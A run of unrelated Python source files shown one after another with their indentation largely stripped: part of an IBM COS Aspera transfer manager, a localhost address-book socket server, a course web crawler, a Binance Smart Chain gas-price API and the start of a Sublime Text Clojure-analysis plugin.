_client_credentials = self._client._request_signer._credentials
self._delegated_token_manager = (
DelegatedTokenManager(api_key_id=_client_credentials.api_key_id,
service_instance_id=_client_credentials.service_instance_id,
auth_endpoint=_client_credentials.auth_endpoint,
receiver_client_ids=RECEIVER_CLIENT_IDS,
verify=self._config.verify_ssl))
def _raw_aspera_metadata(self, bucket):
''' get the Aspera connection details on Aspera enabled buckets '''
response = self._client.get_bucket_aspera(Bucket=bucket)
# Parse metadata from response
aspera_access_key = response['AccessKey']['Id']
aspera_secret_key = response['AccessKey']['Secret']
ats_endpoint = response['ATSEndpoint']
return aspera_access_key, aspera_secret_key, ats_endpoint
def _fetch_transfer_spec(self, node_action, token, bucket_name, paths):
        ''' make an HTTP call to Aspera to fetch back the transfer spec '''
aspera_access_key, aspera_secret_key, ats_endpoint = self._get_aspera_metadata(bucket_name)
_headers = {'accept': "application/json",
'Content-Type': "application/json"}
credentials = {'type': 'token',
'token': {'delegated_refresh_token': token}}
_url = ats_endpoint
_headers['X-Aspera-Storage-Credentials'] = json.dumps(credentials)
_data = {'transfer_requests': [
{'transfer_request': {'paths': paths, 'tags': {'aspera': {
'node': {'storage_credentials': credentials}}}}}]}
_session = requests.Session()
_response = _session.post(url=_url + "/files/" + node_action,
auth=(aspera_access_key, aspera_secret_key),
headers=_headers, json=_data, verify=self._config.verify_ssl)
return _response
def _create_transfer_spec(self, call_args):
''' pass the transfer details to aspera and receive back a
populated transfer spec complete with access token '''
_paths = []
for _file_pair in call_args.file_pair_list:
_path = OrderedDict()
if call_args.direction == enumAsperaDirection.SEND:
_action = "upload_setup"
_path['source'] = _file_pair.fileobj
_path['destination'] = _file_pair.key
else:
_action = "download_setup"
_path['source'] = _file_pair.key
_path['destination'] = _file_pair.fileobj
_paths.append(_path)
# Add credentials before the transfer spec is requested.
delegated_token = self._delegated_token_manager.get_token()
_response = self._fetch_transfer_spec(_action, delegated_token, call_args.bucket, _paths)
tspec_dict = json.loads(_response.content)['transfer_specs'][0]['transfer_spec']
tspec_dict["destination_root"] = "/"
if (call_args.transfer_config):
tspec_dict.update(call_args.transfer_config.dict)
if call_args.transfer_config.is_multi_session_all:
tspec_dict['multi_session'] = 0
_remote_host = tspec_dict['remote_host'].split('.')
# now we append '-all' to the remote host
_remote_host[0] += "-all"
tspec_dict['remote_host'] = ".".join(_remote_host)
logger.info("New remote_host(%s)" % tspec_dict['remote_host'])
call_args.transfer_spec = json.dumps(tspec_dict)
return True
def upload_directory(self, directory, bucket, key, transfer_config=None, subscribers=None):
''' upload a directory using Aspera '''
check_io_access(directory, os.R_OK)
return self._queue_task(bucket, [FilePair(key, directory)], transfer_config,
subscribers, enumAsperaDirection.SEND)
def download_directory(self, bucket, key, directory, transfer_config=None, subscribers=None):
''' download a directory using Aspera '''
check_io_access(directory, os.W_OK)
return self._queue_task(bucket, [FilePair(key, directory)], transfer_config,
subscribers, enumAsperaDirection.RECEIVE)
def upload(self, fileobj, bucket, key, transfer_config=None, subscribers=None):
''' upload a file using Aspera '''
check_io_access(fileobj, os.R_OK, True)
return self._queue_task(bucket, [FilePair(key, fileobj)], transfer_config,
subscribers, enumAsperaDirection.SEND)
def download(self, bucket, key, fileobj, transfer_config=None, subscribers=None):
''' download a file using Aspera '''
check_io_access(os.path.dirname(fileobj), os.W_OK)
return self._queue_task(bucket, [FilePair(key, fileobj)], transfer_config,
subscribers, enumAsperaDirection.RECEIVE)
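    # A minimal usage sketch (assuming `cos_client` is an IBM COS client created elsewhere,
    # e.g. with ibm_boto3; bucket, key and the local path are placeholders):
    #
    #   with AsperaTransferManager(cos_client) as transfer_manager:
    #       future = transfer_manager.upload('/tmp/local.bin', 'my-bucket', 'remote.bin')
    #       future.result()  # block until the Aspera transfer has finished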
@staticmethod
def set_log_details(aspera_log_path=None,
sdk_log_level=logging.NOTSET):
        ''' set the Aspera log path - used by the ascp process
            set the internal Aspera sdk log level - for debug purposes '''
if aspera_log_path:
check_io_access(aspera_log_path, os.W_OK)
AsperaTransferCoordinator.set_log_location(aspera_log_path)
if sdk_log_level != logging.NOTSET:
if logger:
if not len(logger.handlers):
handler = logging.StreamHandler()
_fmt = '%(asctime)s %(levelname)s %(message)s'
handler.setFormatter(logging.Formatter(_fmt))
logger.addHandler(handler)
logger.setLevel(sdk_log_level)
def _validate_args(self, args):
''' validate the user arguments '''
assert(args.bucket)
if args.subscribers:
for _subscriber in args.subscribers:
assert(isinstance(_subscriber, AsperaBaseSubscriber))
if (args.transfer_config):
assert(isinstance(args.transfer_config, AsperaConfig))
            # the number of sessions requested can't be greater than the maximum number of ascp processes
if args.transfer_config.multi_session > self._config.ascp_max_concurrent:
raise ValueError("Max sessions is %d" % self._config.ascp_max_concurrent)
for _pair in args.file_pair_list:
if not _pair.key or not _pair.fileobj:
raise ValueError("Invalid file pair")
def _queue_task(self, bucket, file_pair_list, transfer_config, subscribers, direction):
        ''' queue the upload/download - it gets processed when resources become available.
            Use the class-level transfer_config if none is passed in. '''
config = transfer_config if transfer_config else self._transfer_config
_call_args = CallArgs(bucket=bucket,
file_pair_list=file_pair_list,
transfer_config=config,
subscribers=subscribers,
direction=direction,
transfer_spec=None,
transfer_spec_func=self._create_transfer_spec,
transfer_id=str(uuid.uuid4()))
self._validate_args(_call_args)
return self._coordinator_controller._queue_task(_call_args)
def __enter__(self):
''' enter the AsperaTransferManager scope '''
return self
def __exit__(self, exc_type, exc_value, *args):
''' exit the AsperaTransferManager scope
cancel all running transfers and free resources '''
cancel = False
cancel_msg = ''
cancel_exc_type = FatalError
# If a exception was raised in the context handler, signal to cancel
# all of the in progress futures in the shutdown.
if exc_type:
cancel = True
cancel_msg = six.text_type(exc_value)
if not cancel_msg:
cancel_msg = repr(exc_value)
# If it was a KeyboardInterrupt, the cancellation was initiated by the user.
if isinstance(exc_value, KeyboardInterrupt):
cancel_exc_type = CancelledError
self._shutdown(cancel, cancel_msg, cancel_exc_type)
def shutdown(self, cancel=False, cancel_msg=''):
"""Shutdown the TransferManager
waits till all transfers complete before it completely shuts down.
:type cancel: boolean
:param cancel: If True, calls TransferFuture.cancel() for
            all in-progress transfers. This is useful if you want the
shutdown to happen quicker.
:type cancel_msg: str
:param cancel_msg: The message to specify if canceling all in-progress
transfers.
"""
        self._shutdown(cancel, cancel_msg)
def _shutdown(self, cancel, cancel_msg, exc_type=CancelledError):
''' Internal shutdown used by 'shutdown' method above '''
if cancel:
# Cancel all in-flight transfers if requested, before waiting
# for them to complete.
self._coordinator_controller.cancel(cancel_msg, exc_type)
try:
# Wait until there are no more in-progress transfers. This is
# wrapped in a try statement because this can be interrupted
# with a KeyboardInterrupt that needs to be caught.
self._coordinator_controller.wait()
except KeyboardInterrupt:
# If not errors were raised in the try block, the cancel should
# have no coordinators it needs to run cancel on. If there was
# an error raised in the try statement we want to cancel all of
# the inflight transfers before shutting down to speed that
# process up.
self._coordinator_controller.cancel('KeyboardInterrupt()')
raise
finally:
self._coordinator_controller.cleanup()
def wait(self):
''' wait for all transfers complete '''
self._coordinator_controller.wait()
class AsperaTransferCoordinatorController(TransferCoordinatorController):
def __init__(self, config):
""" Abstraction to control all transfer coordinators
This abstraction allows the manager to wait for inprogress transfers
to complete and cancel all inprogress transfers."""
super(AsperaTransferCoordinatorController, self).__init__()
self._config = config
self._waiting_transfer_coordinators = deque()
self._processed_coordinators = []
self._lockw = threading.Lock()
self._processing_thread = None
self._processing_event = threading.Event()
self._processing_stopped_event = threading.Event()
self._processing_stop = False
self._cancel_called = False
self._wait_called = False
def cleanup(self):
        ''' Stop the background thread and clean up resources '''
self._processing_stop = True
self._wakeup_processing_thread()
self._processing_stopped_event.wait(3)
def tracked_coordinator_count(self, count_ascps=False):
        ''' count the number of coordinators currently being processed
            or count the number of ascp processes currently being used '''
with self._lock:
_count = 0
if count_ascps:
for _coordinator in self._tracked_transfer_coordinators:
_count += _coordinator.session_count
else:
_count = len(self._tracked_transfer_coordinators)
return _count
def _in_waiting_queue(self, _coordinator):
''' check to see if a coordinator object is in the waiting queue '''
with self._lockw:
return _coordinator in self._waiting_transfer_coordinators
def waiting_coordinator_count(self):
''' count the number of transfers waiting to be processed '''
with self._lockw:
return len(self._waiting_transfer_coordinators)
def _queue_task(self, args):
''' add transfer to waiting queue if possible
then notify the background thread to process it '''
if self._cancel_called:
raise AsperaTransferQueueError("Cancel already called")
elif self._wait_called:
raise AsperaTransferQueueError("Cant queue items during wait")
elif self.waiting_coordinator_count() >= self._config.max_submission_queue_size:
raise AsperaTransferQueueError("Max queued items reached")
else:
_coordinator = AsperaTransferCoordinator(args)
_components = {'meta': TransferMeta(args, transfer_id=args.transfer_id),
'coordinator': _coordinator}
_transfer_future = AsperaTransferFuture(**_components)
_coordinator.add_subscribers(args.subscribers, future=_transfer_future)
_coordinator.add_done_callback(self.remove_aspera_coordinator,
transfer_coordinator=_coordinator)
self.append_waiting_queue(_coordinator)
if not self._processing_thread:
self._processing_thread = threading.Thread(target=self._process_waiting_queue)
self._processing_thread.daemon = True
self._processing_thread.start()
self._wakeup_processing_thread()
return _transfer_future
def remove_aspera_coordinator(self, transfer_coordinator):
        ''' remove an entry from the waiting queue,
            or remove an item from the processing queue and add it to the processed queue;
            notify the background thread as it may be able to process waiting requests
        '''
# usually called on processing completion - but can be called for a cancel
if self._in_waiting_queue(transfer_coordinator):
logger.info("Remove from waiting queue count=%d" % self.waiting_coordinator_count())
with self._lockw:
self._waiting_transfer_coordinators.remove(transfer_coordinator)
else:
logger.info("Remove from processing queue count=%d" % self.tracked_coordinator_count())
try:
self.remove_transfer_coordinator(transfer_coordinator)
self.append_processed_queue(transfer_coordinator)
except Exception:
pass
self._wakeup_processing_thread()
def append_waiting_queue(self, transfer_coordinator):
''' append item to waiting queue '''
logger.debug("Add to waiting queue count=%d" % self.waiting_coordinator_count())
with self._lockw:
self._waiting_transfer_coordinators.append(transfer_coordinator)
def _wakeup_processing_thread(self):
''' set the threading event to wakeup background thread '''
self._processing_event.set()
def append_processed_queue(self, transfer_coordinator):
''' append item to processed queue '''
with self._lock:
self._processed_coordinators.append(transfer_coordinator)
def free_processed_queue(self):
        ''' call the Aspera sdk to free up resources '''
with self._lock:
if len(self._processed_coordinators) > 0:
for _coordinator in self._processed_coordinators:
_coordinator.free_resources()
self._processed_coordinators = []
def is_stop(self):
''' has either of the stop processing flags been set '''
if len(self._processed_coordinators) > 0:
self.free_processed_queue()
return self._cancel_called or self._processing_stop
def _process_waiting_queue(self):
        ''' thread that processes the waiting queue:
            fetches the transfer spec,
            then calls start transfer,
            ensuring that the maximum number of ascp processes is not exceeded '''
logger.info("Queue processing thread started")
while not self.is_stop():
self._processing_event.wait(3)
self._processing_event.clear()
if self.is_stop():
break
while self.waiting_coordinator_count() > 0:
if self.is_stop():
break
_used_slots = self.tracked_coordinator_count(True)
_free_slots = self._config.ascp_max_concurrent - _used_slots
if _free_slots <= 0:
break
with self._lockw:
# check are there enough free slots
_req_slots = self._waiting_transfer_coordinators[0].session_count
if _req_slots > _free_slots:
break
_coordinator = self._waiting_transfer_coordinators.popleft()
self.add_transfer_coordinator(_coordinator)
if not _coordinator.set_transfer_spec():
self.remove_aspera_coordinator(_coordinator)
else:
logger.info("ASCP process queue - Max(%d) InUse(%d) Free(%d) New(%d)" %
(self._config.ascp_max_concurrent,
_used_slots,
_free_slots,
_req_slots))
_coordinator.start_transfer()
logger.info("Queue processing thread stopped")
self._processing_stopped_event.set()
def clear_waiting_coordinators(self, cancel=False):
        ''' remove all entries from the waiting queue, optionally cancelling each one '''
with self._lockw:
if cancel:
for _coordinator in self._waiting_transfer_coordinators:
_coordinator.notify_cancelled("Clear Waiting Queue", False)
self._waiting_transfer_coordinators.clear()
def cancel(self, *args, **kwargs):
""" Cancel all queue items - then attempt to cancel all in progress items """
self._cancel_called = True
self.clear_waiting_coordinators(cancel=True)
super(AsperaTransferCoordinatorController, self).cancel(*args, **kwargs)
def wait(self):
""" Wait until all in progress and queued items are processed """
self._wait_called = True
while self.tracked_coordinator_count() > 0 or \
self.waiting_coordinator_count() > 0:
time.sleep(1)
super(AsperaTransferCoordinatorController, self).wait()
self._wait_called = False
|
Addressbook_server.py
|
# Import of libraries
import socket # Import main socket library
import atexit # Execute something before exit
import multiprocessing # For multiple sockets
from Utils import * # General program utilities
from Database import Database
class Socket:
def __init__(self, port, db, pr, ui):
self.ui = ui
self.db = db
self.pr = pr
ui.show("Opening port")
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.bind(('localhost', port))
self.s.listen(5) #become a server socket, maximum 5 connections
ui.show("Ready to accept connections")
def close(self):
self.connection.close()
def handle(self):
try:
while True:
buf = self.connection.recv(255)
if len(buf)> 0:
self.ui.show("serving connection")
temp = self.db.Search( self.pr.GetData( buf.decode('utf-8') ) )
if temp != False:
self.connection.send( self.pr.CreateMessage(temp, False).encode("UTF-8") )
else:
self.connection.send( self.pr.CreateMessage( "NOT_FOUND", False ).encode("UTF-8") )
except:
pass
finally:
self.connection.close()
def work(self):
while True:
self.connection, address = self.s.accept()
process = multiprocessing.Process(
target=self.handle)
process.daemon = True
process.start()
u = UI()
p = Protocol()
d = Database(u)
s = Socket(5678, d, p, u)
# Initialize the socket
s.work()
def exit_handler():
s.close()
atexit.register(exit_handler)
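# A rough client-side sketch for manual testing; the exact wire format depends on the
# Protocol class from Utils (not shown here), so the payload below is only a placeholder:
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('localhost', 5678))
#   c.send('<query encoded by Protocol.CreateMessage>'.encode('utf-8'))
#   print(c.recv(255).decode('utf-8'))
#   c.close()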
|
crawler_multi_thread.py
|
# SJTU EE208
import threading
import queue
import string
import time
import re
import sys
import os
try:
from lxml import etree
from bs4 import BeautifulSoup
except ImportError:
print('Requirements not satisfied! Please run: pip install -r requirements.txt')
import urllib.request
import urllib.error
import urllib.parse
def get_content(page):
'''
get the content of a page.
Input:
page: str.
Return:
content: str.
'''
headers = {
"user-agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)\
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/85.0.4183.83 Safari/537.36 Edg/85.0.564.44',
}
# add headers to avoid some websites' 403 Forbidden error.
try:
req = urllib.request.Request(url=page, headers=headers)
content = urllib.request.urlopen(req, timeout=10).read().decode('utf-8', 'ignore')
except BaseException as e:
print(e)
return None
else:
return content
def get_all_links(content, page, method='lxml'):
'''
get all the links of the page.
Input:
content: the content of the given page.
page: the URL of the page.
method: it should be 'lxml' or 'BeautifulSoup',
            determining which method is used to process the content.
            By default we use 'lxml', because it is much faster.
Return:
links: list, containing all the useful 'href's of the given page's content.
'''
def valid_str(s: str):
'''
Check whether the string s is a valid URL.
        A valid URL should be an absolute address
or a relative address beginning with '//'.
'''
return (len(s) > 1 and s[:2] == '//') \
or (len(s) > 3 and s[:4] == 'http')
links = None
target_pattern = re.compile('^http|^/')
if method == 'lxml':
# get all the links through 'lxml' and its xpath method.
links = etree.HTML(content.encode('utf-8')).xpath('//a/@href')
links = [urllib.parse.urljoin(page, x) for x in links if valid_str(x)]
elif method == 'BeautifulSoup':
# get all the links through 'BeautifulSoup'
soup = BeautifulSoup(content, features="html.parser")
tag_a = soup.find_all('a', {'href': re.compile('^http|^/')})
links = [x['href'] for x in tag_a]
links = [urllib.parse.urljoin(page, x) for x in links]
else:
raise ValueError
return list(set(links)) # remove duplicate
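# For example (hypothetical page), both extraction methods return absolute, deduplicated URLs:
#
#   html = get_content('https://www.example.com')
#   links = get_all_links(html, 'https://www.example.com', method='lxml')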
def valid_filename(s):
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
s = ''.join(c for c in s if c in valid_chars)
if len(s) > 127:
s = s[:127] # avoid file name too long error.
return s
def add_page_to_folder(page, content):  # save the page to a folder and record the URL and its file name in index.txt
    index_filename = 'index.txt'  # each line of index.txt is 'URL<tab>file name'
    folder = 'html_multi'  # the folder used to store the pages
    filename = valid_filename(page)  # turn the URL into a valid file name
    filename = filename + '.html'
    index = open(index_filename, 'a')
    index.write(str(page.encode('ascii', 'ignore')) + '\t' + filename + '\n')
    index.close()
    if not os.path.exists(folder):  # create the folder if it does not exist
        os.mkdir(folder)
    f = open(os.path.join(folder, filename), 'w', encoding='utf-8')
    f.write(str(content))  # write the page content into the file
    f.close()
def working():
global count
while True:
page = q.get()
if count >= max_page:
q.task_done()
return
print(f'current page: {page}')
# pages = get_page(page) # get the content of the page
content = get_content(page)
        if content is None:  # which means that some error occurred when trying to get the content of the page.
q.task_done()
continue
add_page_to_folder(page, content) # add the page to the folder we use to store the pages we get.
outlinks = get_all_links(content, page) # get the links of the page.
if varLock.acquire():
for link in outlinks:
if link not in crawled:
q.put(link)
crawled.add(link)
print(f'task complete: {count}/{max_page}')
crawled.add(page)
count += 1
varLock.release()
q.task_done()
def get_seed_and_maxPage():
'''
get the seed and max page number from
whether command line argument or console input.
'''
seed = None
max_page = None
if len(sys.argv) == 1:
seed = input("please input the seed URL: ")
while True:
try:
max_page = int(input("please input the max page number: "))
except ValueError:
print("Invalid max page number, please input again: ")
else:
break
else:
_, seed, max_page = sys.argv
while True:
print(1)
try:
max_page = int(max_page)
except ValueError:
max_page = input("Invalid max page number, please input again: ")
else:
break
return seed, max_page
if __name__ == '__main__':
print('current folder: ', os.getcwd())
seed, max_page = get_seed_and_maxPage()
start = time.time() # start time.
count = 0 # the number of pages we have saved in our local machine.
crawled = set([seed]) # A set used to determine whether a URL is crawled or not.
varLock = threading.Lock() # the lock used to avoid unpredictable error caused by multithread.
q = queue.Queue()
q.put(seed)
thread_list = [] # the list used to store all the subthreads.
for i in range(4):
t = threading.Thread(target=working)
        t.setDaemon(True)  # set the thread to be a daemon thread.
thread_list.append(t)
t.start()
for x in thread_list:
        x.join()  # the main thread will wait here until the task is
        # completed by the subthreads.
end = time.time()
print(end - start) # calculate the consumed time.
with open('crawled.txt', 'w', encoding='utf-8') as f:
for x in crawled:
f.write(x)
            f.write('\n')  # write all the crawled URLs into the file f.
|
gasprice.py
|
import os
import click
import logging
import pandas as pd
from time import sleep
from threading import Thread
from collections import deque
from statistics import mean
from itertools import chain
from web3 import Web3, HTTPProvider
from web3.middleware import geth_poa_middleware
from sanic import Sanic, response
from retry import retry
import random
import time
# https://bsc-dataseed1.defibit.io/
# https://bsc-dataseed1.ninicoin.io/ # is too slow
BSC_RPCS = ['https://bsc-dataseed.binance.org/', 'https://bsc-dataseed1.defibit.io/']
BSC_RPC_URL = os.environ.get('BSC_RPC_URL', BSC_RPCS[0])
QUANTILES = dict(SafeGasPrice=0, ProposeGasPrice=5, FastGasPrice=7.5, InstantGasPrice=15)
WINDOW = 50
w3 = Web3(HTTPProvider(BSC_RPC_URL, request_kwargs={'timeout': 15}))
w3.middleware_onion.inject(geth_poa_middleware, layer=0)
app = Sanic('bscgas')
log = logging.getLogger('sanic.error')
app.config.LOGO = ''
block_times = deque(maxlen=WINDOW)
blocks_gwei = deque(maxlen=WINDOW)
stats = {}
instances = {}
def web3_instance():
random_index = random.randint(0, len(BSC_RPCS)-1)
w3 = Web3(HTTPProvider(BSC_RPCS[random_index],request_kwargs={'timeout': 15}))
w3.middleware_onion.inject(geth_poa_middleware, layer=0, name='i'+str(random_index))
log.warning("get index ----: {} {}".format(str(random_index), BSC_RPCS[random_index]))
return w3
# @retry(Exception, delay=2, logger=log)
def worker(skip_warmup):
stats['health'] = False
localw3 = web3_instance()
localw3.middleware_onion.inject(geth_poa_middleware, layer=0)
# print(localw3.clientVersion)
latest = localw3.eth.filter('latest')
# print('worker:', latest)
if not skip_warmup and not block_times:
warmup()
while True:
try:
for n in latest.get_new_entries():
process_block(localw3, n)
log.info(str(stats))
if not localw3.eth.syncing:
stats['health'] = True
except:
sleep(5)
localw3 = web3_instance()
latest = localw3.eth.filter('latest')
log.warning("do reconnect ------- {} {} {}".format(int(time.time()), str(localw3), str(latest)))
continue
sleep(2)
def warmup():
tip = w3.eth.blockNumber
with click.progressbar(range(tip - WINDOW, tip), label='warming up') as bar:
for n in bar:
process_block(w3, n)
def block_time():
if len(block_times) < 2:
return 0
times = sorted(block_times)
avg = mean(b - a for a, b in zip(times, times[1:]))
stats['block_time'] = round(avg, 2)
return avg
def average(lst):
return sum(lst) / len(lst)
def process_block(w3i, n):
block = w3i.eth.getBlock(n, True)
stats['block_number'] = block.number
block_times.append(block.timestamp)
if len(block_times) > 1:
t = sorted(block_times)
stats['block_time'] = round(mean(b - a for a, b in zip(t, t[1:])), 3)
if block.transactions:
prices = []
for tx in block.transactions:
if int(tx.gasPrice) > 0:
prices.append(tx.gasPrice)
blocks_gwei.append(min(prices))
data = pd.Series(blocks_gwei)
for name, q in QUANTILES.items():
if name in ['FastGasPrice']:
stats[name] = round(float(w3i.fromWei(average(prices), 'gwei')), 3)
elif name in ['InstantGasPrice']:
stats[name] = round(float(w3i.fromWei(max(prices), 'gwei')), 3)
else:
price = data.quantile(q / 100)
stats[name] = round(float(w3i.fromWei(price, 'gwei')), 3)
print(stats)
return block
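# Sketch of the statistics computed above (illustrative numbers): SafeGasPrice and
# ProposeGasPrice are the 0th and 5th percentile of the per-block minimum gas prices in the
# rolling window, while FastGasPrice/InstantGasPrice use the mean/max price of the latest block.
#
#   import pandas as pd
#   pd.Series([5, 6, 7, 8, 9]).quantile(0.05)  # -> 5.2 (with the default linear interpolation)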
@app.route('/')
async def api(request):
return response.json(stats)
@app.route('/health')
async def health(request):
return response.json({'health': stats['health']}, status=200 if stats['health'] else 503)
@click.command()
@click.option('--host', '-h', default='0.0.0.0')
@click.option('--port', '-p', default=8000)
@click.option('--skip-warmup', '-s', is_flag=False)
def main(host, port, skip_warmup):
print('skip_warmup', skip_warmup, host, port)
bg = Thread(target=worker, args=(skip_warmup,))
bg.daemon = True
bg.start()
app.run(host=host, port=port, access_log=False)
if __name__ == '__main__':
main()
|
pep.py
|
import html
import inspect
import subprocess
import os
import re
import tempfile
import json
import traceback
import pprint
import threading
import time
import linecache
import pathlib
from urllib.parse import urlparse
from zipfile import ZipFile
from collections import defaultdict
import sublime_plugin
import sublime
GOTO_DEFAULT_FLAGS = sublime.ENCODED_POSITION
GOTO_USAGE_FLAGS = sublime.ENCODED_POSITION | sublime.TRANSIENT
GOTO_SIDE_BY_SIDE_FLAGS = (
sublime.ENCODED_POSITION
| sublime.SEMI_TRANSIENT
| sublime.ADD_TO_SELECTION
| sublime.CLEAR_TO_RIGHT
)
# Thingy types
TT_KEYWORD = "keyword"
TT_LOCAL_BINDING = "local_binding"
TT_LOCAL_USAGE = "local_usage"
TT_VAR_DEFINITION = "var_definition"
TT_VAR_USAGE = "var_usage"
TT_NAMESPACE_DEFINITION = "namespace_definition"
TT_NAMESPACE_USAGE = "namespace_usage"
TT_NAMESPACE_USAGE_ALIAS = "namespace_usage_alias"
OUTPUT_PANEL_NAME = "pep"
OUTPUT_PANEL_NAME_PREFIXED = f"output.{OUTPUT_PANEL_NAME}"
_view_analysis_ = {}
_paths_analysis_ = {}
_classpath_analysis_ = {}
def show_output_panel(window):
window.run_command("show_panel", {"panel": OUTPUT_PANEL_NAME_PREFIXED})
def hide_output_panel(window):
window.run_command("hide_panel", {"panel": OUTPUT_PANEL_NAME_PREFIXED})
def hide_active_output_panel(window):
if window.active_panel() == OUTPUT_PANEL_NAME_PREFIXED:
hide_output_panel(window)
def output_panel(window):
return window.find_output_panel(OUTPUT_PANEL_NAME) or window.create_output_panel(
OUTPUT_PANEL_NAME
)
def set_paths_analysis(project_path, analysis):
"""
Updates analysis for paths.
"""
global _paths_analysis_
_paths_analysis_[project_path] = analysis
def paths_analysis(project_path):
"""
Returns analysis for paths.
"""
global _paths_analysis_
return _paths_analysis_.get(project_path, {})
def set_classpath_analysis(project_path, analysis):
"""
Updates analysis for project.
"""
global _classpath_analysis_
_classpath_analysis_[project_path] = analysis
def classpath_analysis(project_path):
"""
Returns analysis for project.
"""
global _classpath_analysis_
return _classpath_analysis_.get(project_path, {})
def set_view_analysis(view_id, analysis):
"""
Updates analysis for a particular view.
"""
global _view_analysis_
_view_analysis_[view_id] = analysis
def view_analysis(view_id):
"""
Returns analysis for a particular view.
"""
global _view_analysis_
return _view_analysis_.get(view_id, {})
# ---
def analysis_view_change_count(view):
return view_analysis(view.id()).get("view_change_count")
def analysis_findings(analysis):
return analysis.get("findings", {})
def analysis_summary(analysis):
return analysis.get("summary", {})
def analysis_kindex(analysis):
"""
Returns a dictionary of keywords by (namespace, name).
'kindex' stands for 'keyword index'.
"""
return analysis.get("kindex", {})
def analysis_krn(analysis):
"""
Returns a dictionary of keywords by row.
    This index can be used to quickly find a keyword by row.
'krn' stands for 'keyword row name'.
"""
return analysis.get("krn", {})
def analysis_vindex(analysis):
"""
Returns a dictionary of vars by (namespace, name).
'vindex' stands for 'var index'.
"""
return analysis.get("vindex", {})
def analysis_vindex_usages(analysis):
"""
Returns a dictionary of Var usages by (namespace, name).
    'vindex_usages' stands for 'Var usages index'.
"""
return analysis.get("vindex_usages", {})
def analysis_vrn(analysis):
"""
Returns a dictionary of Vars by row.
    This index can be used to quickly find a Var definition by row.
'vrn' stands for 'var row name'.
"""
return analysis.get("vrn", {})
def analysis_vrn_usages(analysis):
"""
Returns a dictionary of Var usages by row.
    This index can be used to quickly find a Var usage by row.
'vrn' stands for 'var row name'.
"""
return analysis.get("vrn_usages", {})
def analysis_lindex(analysis):
"""
Returns a dictionary of locals by ID.
This index can be used to find a local in constant time if you know its ID.
When finding usages from a usage itself, the first step is to find the usage,
once you have found it, you can use its ID to find the local.
Locals and usages have the same ID,
    so it's possible to correlate a usage with a local.
'lindex' stands for 'local index'.
"""
return analysis.get("lindex", {})
def analysis_lrn(analysis):
"""
Returns a dictionary of locals by row.
    This index can be used to quickly find a local definition by row.
Example: (let [a| 1] ...)
'lrn' stands for 'local row name'.
"""
return analysis.get("lrn", {})
def analysis_lrn_usages(analysis):
"""
Returns a dictionary of local usages by row.
    This index can be used to quickly find a local usage by row.
Example: (let [a 1] |a)
'lrn' stands for 'local row name'.
"""
return analysis.get("lrn_usages", {})
def analysis_nindex(analysis):
"""
Returns a dictionary of namespace definition by name.
'nindex' stands for 'Namespace index'.
"""
return analysis.get("nindex", {})
def analysis_nindex_usages(analysis):
"""
Returns a dictionary of namespace usages by name.
'nindex' stands for 'namespace index'.
"""
return analysis.get("nindex_usages", {})
def analysis_nrn(analysis):
"""
Returns a dictionary of namespaces by row.
"""
return analysis.get("nrn", {})
def analysis_nrn_usages(analysis):
"""
Returns a dictionary of namespace usages by row.
    This index can be used to quickly find a namespace usage by row.
'nrn' stands for 'namespace row name'.
"""
return analysis.get("nrn_usages", {})
def namespace_definitions(analysis):
"""
Returns a list of namespace definitions.
"""
l = []
for namespace_definitions in analysis_nindex(analysis).values():
for namespace_definition in namespace_definitions:
l.append(namespace_definition)
return l
def var_definitions(analysis):
"""
Returns a list of var definitions.
"""
l = []
for var_definitions in analysis_vindex(analysis).values():
for var_definition in var_definitions:
l.append(var_definition)
return l
def var_usages(analysis, name):
"""
Returns Var usages for name.
"""
usages = analysis_vindex_usages(analysis).get(name, [])
return remove_empty_rows(usages)
def recursive_usage(thingy_usage):
usage_from = thingy_usage.get("from")
usage_to = thingy_usage.get("to")
usage_name = thingy_usage.get("name")
usage_from_var = thingy_usage.get("from-var")
is_same_ns = usage_from == usage_to
is_same_var = usage_name == usage_from_var
return is_same_ns and is_same_var
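# Illustrative example (the field names match the clj-kondo var-usage data used
# above; the concrete values are hypothetical):
#
#     recursive_usage({"from": "app.core", "to": "app.core",
#                      "name": "walk", "from-var": "walk"})    # => True
#     recursive_usage({"from": "app.ui", "to": "app.core",
#                      "name": "walk", "from-var": "render"})  # => False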
def namespace_index(
analysis,
nindex=True,
nindex_usages=True,
nrn=True,
nrn_usages=True,
):
"""
Index namespace definitions and usages.
Definitions are indexed by name and file extension.
Usages are indexed by name.
Returns dict with keys 'nindex', 'nindex_usages', 'nrn', 'nrn_usages'.
"""
namespace_definitions = analysis.get("namespace-definitions", [])
# Namespace definitions indexed by name.
nindex_ = {}
# Namespace definitions indexed by row.
nrn_ = {}
if nindex or nrn:
for namespace_definition in namespace_definitions:
if nindex:
name = namespace_definition.get("name")
nindex_.setdefault(name, []).append(namespace_definition)
if nrn:
name_row = namespace_definition.get("name-row")
nrn_.setdefault(name_row, []).append(namespace_definition)
# Namespace usages indexed by name.
nindex_usages_ = {}
    # Namespace usages indexed by row.
nrn_usages_ = {}
if nindex_usages or nrn_usages:
for namespace_usage in analysis.get("namespace-usages", []):
if nindex_usages:
name = namespace_usage.get("to")
nindex_usages_.setdefault(name, []).append(namespace_usage)
if nrn_usages:
name_row = namespace_usage.get("name-row")
nrn_usages_.setdefault(name_row, []).append(namespace_usage)
# Index alias row (in case there's one).
# Note: It's possible to have both the name and alias in the same row.
if namespace_usage.get("alias"):
alias_row = namespace_usage.get("alias-row")
nrn_usages_.setdefault(alias_row, []).append(namespace_usage)
return {
"nindex": nindex_,
"nindex_usages": nindex_usages_,
"nrn": nrn_,
"nrn_usages": nrn_usages_,
}
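# A minimal sketch of the indexes produced above for a single namespace usage
# (the keys mirror the clj-kondo analysis fields read by the function; the
# namespace name and rows are hypothetical):
#
#     usage = {"to": "app.db", "alias": "db", "name-row": 3, "alias-row": 3}
#     namespace_index({"namespace-definitions": [], "namespace-usages": [usage]})
#     # => {"nindex": {},
#     #     "nindex_usages": {"app.db": [usage]},
#     #     "nrn": {},
#     #     "nrn_usages": {3: [usage, usage]}}  # indexed once by name row, once by alias row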
def keyword_index(
analysis,
kindex=True,
):
# Keywords indexed by name - tuple of namespace and name.
kindex_ = {}
if kindex:
for keyword in analysis.get("keywords", []):
ns = keyword.get("ns")
